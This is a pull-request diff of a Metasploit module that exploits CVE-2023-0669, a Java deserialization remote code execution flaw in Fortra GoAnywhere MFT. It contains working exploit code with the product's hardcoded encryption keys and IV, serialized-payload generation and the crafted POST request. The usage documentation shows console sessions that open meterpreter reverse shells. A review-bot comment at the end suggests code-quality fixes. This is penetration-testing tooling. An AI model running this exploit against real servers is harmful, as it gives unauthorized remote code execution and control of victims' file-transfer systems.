Merge pull request #3 from smcintyre-r7/pr/collab/17607
Pr/collab/17607
commit
0c6ebed3ac
|
@ -10,7 +10,7 @@ register - you can just create a free account and download the application.
|
|||
1. Install the application
|
||||
1. Start the application on the server with `./goanywhere.sh start`
|
||||
1. Start msfconsole
|
||||
1. Do: `use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669`
|
||||
1. Do: `use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669`
|
||||
1. Set `LHOST` / `RHOST`
|
||||
1. Do: `run`
|
||||
1. You should get a shell.
|
||||
|
@ -19,20 +19,19 @@ register - you can just create a free account and download the application.
|
|||
|
||||
### TARGET_URI
|
||||
|
||||
Set to the base path for the exploit - the default
|
||||
(`/goanywhere/lic/accept?bundle=`) is usually fine.
|
||||
Set to the base path for the exploit - the default (`/goanywhere/lic/accept`) is usually fine.
|
||||
|
||||
### VERSION
|
||||
### Version
|
||||
|
||||
The version number of the encryption, which is appended to the encrypted text.
|
||||
Changing the target will change this, but normally you don't have to tweak this.
|
||||
|
||||
Some hosts (like in FIPS-compliant mode) don't allow version 1, but preumably
|
||||
Some hosts (like in FIPS-compliant mode) don't allow version 1, but presumably
|
||||
there are older hosts that don't support version 2.
|
||||
|
||||
### ENCRYPTION_KEY / ENCRYPTION_IV / ENCRYPTION_ALGORITHM
|
||||
### EncryptionKey / EncryptionIv / EncryptionAlgorithm
|
||||
|
||||
How to encrypt the object. Depending on the `VERSION`, there are different
|
||||
How to encrypt the object. Depending on the `Version`, there are different
|
||||
keys. This is updated when you change TARGET and probably doesn't need to be
|
||||
changed.
|
||||
|
||||
|
@ -41,7 +40,7 @@ changed.
|
|||
### Version 7.1.1 on Fedora Linux
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669
|
||||
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
|
||||
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
|
||||
|
||||
msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
|
||||
|
@ -63,7 +62,7 @@ Server username: ron
|
|||
### Using an earlier encryption version
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669
|
||||
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
|
||||
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
|
||||
|
||||
msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
|
||||
|
@ -102,7 +101,7 @@ meterpreter >
|
|||
# Version 7.1.1 over HTTP
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669
|
||||
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
|
||||
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
|
||||
|
||||
msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
|
|
@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
include Msf::Exploit::JavaDeserialization
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -29,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
],
|
||||
'DisclosureDate' => '2023-02-01',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'unix',
|
||||
'Platform' => ['unix', 'win'],
|
||||
'Arch' => [ARCH_CMD],
|
||||
'Privileged' => false,
|
||||
'Targets' => [
|
||||
|
@ -37,10 +36,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Version 2 Encryption',
|
||||
{
|
||||
'DefaultOptions' => {
|
||||
'VERSION' => '$2',
|
||||
'ENCRYPTION_KEY' => 'Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=',
|
||||
'ENCRYPTION_IV' => 'QUVTL0NCQy9QS0NTNVBhZA==',
|
||||
'ENCRYPTION_ALGORITHM' => 'AES-256-CBC'
|
||||
'Version' => '$2',
|
||||
'EncryptionKey' => '0e69a3839b6ecf45649b861f4a27171b66870c9567a4144ebaf3d52fdc4064ca',
|
||||
'EncryptionIv' => '4145532f4342432f504b435335506164'
|
||||
}
|
||||
},
|
||||
],
|
||||
|
@ -48,10 +46,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Version 1 Encryption',
|
||||
{
|
||||
'DefaultOptions' => {
|
||||
'VERSION' => nil,
|
||||
'ENCRYPTION_KEY' => 'Z4tYML+Lii4EdLl9bNGOhF+8SxH8oNavLbHrEUwp/Es=',
|
||||
'ENCRYPTION_IV' => 'QUVTL0NCQy9QS0NTNVBhZA==',
|
||||
'ENCRYPTION_ALGORITHM' => 'AES-256-CBC'
|
||||
'Version' => '',
|
||||
'EncryptionKey' => '678b5830bf8b8a2e0474b97d6cd18e845fbc4b11fca0d6af2db1eb114c29fc4b',
|
||||
'EncryptionIv' => '4145532f4342432f504b435335506164'
|
||||
}
|
||||
}
|
||||
],
|
||||
|
@ -59,8 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => {
|
||||
'RPORT' => 8001,
|
||||
'SSL' => true,
|
||||
'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'
|
||||
'SSL' => true
|
||||
},
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
|
@ -75,30 +71,52 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
])
|
||||
|
||||
register_advanced_options([
|
||||
OptString.new('VERSION', [false, 'A version value to append to the encrypted data', '$2']),
|
||||
OptString.new('ENCRYPTION_KEY', [true, 'The encryption key to use (base64-encoded)']),
|
||||
OptString.new('ENCRYPTION_IV', [true, 'The initialization vector (base64-encoded)']),
|
||||
OptString.new('ENCRYPTION_ALGORITHM', [true, 'The encryption algorithm'])
|
||||
OptString.new('Version', [false, 'A version value to append to the encrypted data']),
|
||||
OptString.new('EncryptionKey', [true, 'The encryption key to use (hex-encoded)'], regex: /^([a-fA-F0-9]{2})+$/),
|
||||
OptString.new('EncryptionIv', [true, 'The initialization vector (hex-encoded)'], regex: /^([a-fA-F0-9]{2})+$/),
|
||||
OptString.new('EncryptionAlgorithm', [true, 'The encryption algorithm', 'AES-256-CBC'])
|
||||
])
|
||||
end
|
||||
|
||||
def build_cipher
|
||||
unless OpenSSL::Cipher.ciphers.any? { |cipher_name| cipher_name.casecmp?(datastore['EncryptionAlgorithm']) }
|
||||
raise Msf::OptionValidateError.new({ 'EncryptionAlgorithm' => 'The selected encryption algorithm is not supported by OpenSSL.' })
|
||||
end
|
||||
|
||||
cipher = OpenSSL::Cipher.new(datastore['EncryptionAlgorithm'])
|
||||
cipher.encrypt
|
||||
|
||||
option_errors = {}
|
||||
iv = datastore['EncryptionIv'].scan(/../).map { |x| x.hex.chr }.join
|
||||
unless cipher.iv_len == iv.length
|
||||
option_errors['EncryptionIv'] = "The encryption IV is not the correct length (is: #{iv.length}, should be: #{cipher.iv_len})."
|
||||
end
|
||||
|
||||
key = datastore['EncryptionKey'].scan(/../).map { |x| x.hex.chr }.join
|
||||
unless cipher.key_len == key.length
|
||||
option_errors['EncryptionKey'] = "The encryption key is not the correct length (is: #{key.length}, should be: #{cipher.key_len})."
|
||||
end
|
||||
raise Msf::OptionValidateError, option_errors unless option_errors.empty?
|
||||
|
||||
cipher.iv = iv
|
||||
cipher.key = key
|
||||
cipher
|
||||
end
|
||||
|
||||
def exploit
|
||||
vprint_status('Generating a serialized Java object with the payload')
|
||||
obj = generate_java_deserialization_for_payload('CommonsBeanutils1', payload)
|
||||
|
||||
vprint_status('Encrypting the payload')
|
||||
cipher = OpenSSL::Cipher.new(datastore['ENCRYPTION_ALGORITHM'])
|
||||
cipher.encrypt
|
||||
cipher.iv = Base64.decode64(datastore['ENCRYPTION_IV'])
|
||||
cipher.key = Base64.decode64(datastore['ENCRYPTION_KEY'])
|
||||
cipher = build_cipher
|
||||
obj = cipher.update(obj) + cipher.final
|
||||
|
||||
vprint_status('Sending request to the server')
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['TARGETURI'],
|
||||
'vars_get' => {
|
||||
'bundle' => "#{Base64.urlsafe_encode64(obj)}#{datastore['VERSION'] || ''}"
|
||||
'vars_post' => {
|
||||
'bundle' => "#{Base64.urlsafe_encode64(obj)}#{datastore['Version'] || ''}"
|
||||
}
|
||||
)
|
||||
|
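Review bot: The `regex:` validators on the new `EncryptionKey` and `EncryptionIv` options use `^`/`$`, which in Ruby anchor to line boundaries rather than the whole string, so a value containing an embedded newline still passes option validation and is then fed to the `scan(/../)` hex decoding in `build_cipher`; anchor both with `\A`/`\z`: `regex: /\A([a-fA-F0-9]{2})+\z/`. The length checks later in `build_cipher` catch some of those values but are not a substitute for full-string validation. The hex decoding `scan(/../).map { |x| x.hex.chr }.join` on the `iv` and `key` lines reads more idiomatically as `[datastore['EncryptionIv']].pack('H*')` (and likewise for the key). Within `build_cipher` the two raises use different forms (`Msf::OptionValidateError.new({ ... })` versus `raise Msf::OptionValidateError, option_errors`); using the class-plus-argument form for both keeps the method consistent. The `exploit` method continues past the end of the hunk.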